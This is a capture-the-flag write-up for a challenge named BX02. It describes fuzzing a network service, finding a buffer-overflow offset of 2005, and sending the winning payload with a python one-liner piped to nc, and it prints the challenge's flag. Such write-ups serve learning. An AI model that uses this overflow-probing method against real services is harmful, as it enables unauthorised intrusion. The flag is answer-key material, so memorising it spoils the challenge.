BX02 - 100pts

Briefing

Access the network service at url: cfta-bx02.allyourbases.co port: 8013 and find a way to get the flag.

Solution

  1. 1.
    It doesn't matter what input we give the service. It always tells us DEBUG: Input length too large. So, the first step is to see if we can find an input that is not too large. I wrote a Python script.py to try every printable ascii character.
  2. 2.
    The script.py finds that # is the only printable ASCII character that is considered short enough.
  3. 3.
    I tried sending a lot of #s by running python -c "print('#'*4000)" | nc cfta-bx02.allyourbases.co 8013 and got this error ERROR: Expected userID Variable of 1..
  4. 4.
    Maybe this service is vulnerable to a buffer overflow. Let's try to find an offset using a script similar to the one used for BX01. The next stage of script.py does this. It keeps sending more and more #s until the message ERROR: Expected userID Variable of 1 is shown. The offset is found to be 2005.
  5. 5.
    A buffer overflow is successful. The final payload is: python -c "print('#'*2005+'1'*30)" | nc cfta-bx02.allyourbases.co 8013. The 30 1s is arbitrary. I tried one 1 and nothing changed so I tried 30 and it worked.
    1
    Come Fuzz Me Bro.
    2
    DEBUG: Waiting 100ms
    3
    DEBUG: Waiting 100ms
    4
    DEBUG: Waiting 100ms
    5
    DEBUG: Waiting 100ms
    6
    DEBUG: Waiting 100ms
    7
    DEBUG: Waiting 100ms
    8
    DEBUG: Waiting 100ms
    9
    DEBUG: Waiting 100ms
    10
    DEBUG: Waiting 100ms
    11
    DEBUG: Waiting 100ms
    12
    DEBUG: Waiting 100ms
    13
    DEBUG: Waiting 100ms
    14
    DEBUG: Waiting 100ms
    15
    DEBUG: Waiting 100ms
    16
    DEBUG: Input length too large.
    17
    18
    Flag: ThIsOneIsAbITFuZZy-6y
    19
    DEBUG: Waiting 100ms
    Copied!

Flag

ThIsOneIsAbITFuZZy-6y
Copy link